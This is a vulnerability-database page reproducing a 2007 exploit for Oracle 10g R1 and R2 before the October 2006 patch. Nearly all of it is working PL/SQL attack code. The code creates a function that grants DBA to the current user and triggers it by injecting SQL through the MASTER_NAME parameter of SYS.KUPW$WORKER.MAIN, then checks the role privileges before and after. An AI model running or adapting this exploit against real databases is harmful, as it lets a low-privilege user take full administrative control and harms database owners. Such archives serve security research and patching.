Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJoxean KoretPACKETSTORM:53869
HistoryJan 24, 2007 - 12:00 a.m.

oracle10g-2.txt

2007-01-2400:00:00
Joxean Koret
packetstormsecurity.com
16
JSON
`/**  
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006  
* Joxean Koret <[email protected]>  
* Privileges needed:  
*  
* - CREATE SESSION  
* - CREATE PROCEDURE  
*  
*/  
select *  
from user_role_privs  
;  
  
CREATE OR REPLACE FUNCTION F1  
RETURN NUMBER AUTHID CURRENT_USER  
IS  
PRAGMA AUTONOMOUS_TRANSACTION;  
BEGIN  
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';  
COMMIT;  
RETURN(1);  
END;  
/  
  
DECLARE  
MASTER_NAME VARCHAR2(200);  
MASTER_OWNER VARCHAR2(200);  
BEGIN  
MASTER_NAME := ''' or ' || user || '.f1=1--';  
MASTER_OWNER := 'bla';  
SYS.KUPW$WORKER.MAIN(  
MASTER_NAME => MASTER_NAME,  
MASTER_OWNER => MASTER_OWNER  
);  
END;  
/  
  
select *  
from user_role_privs  
;  
`
JSON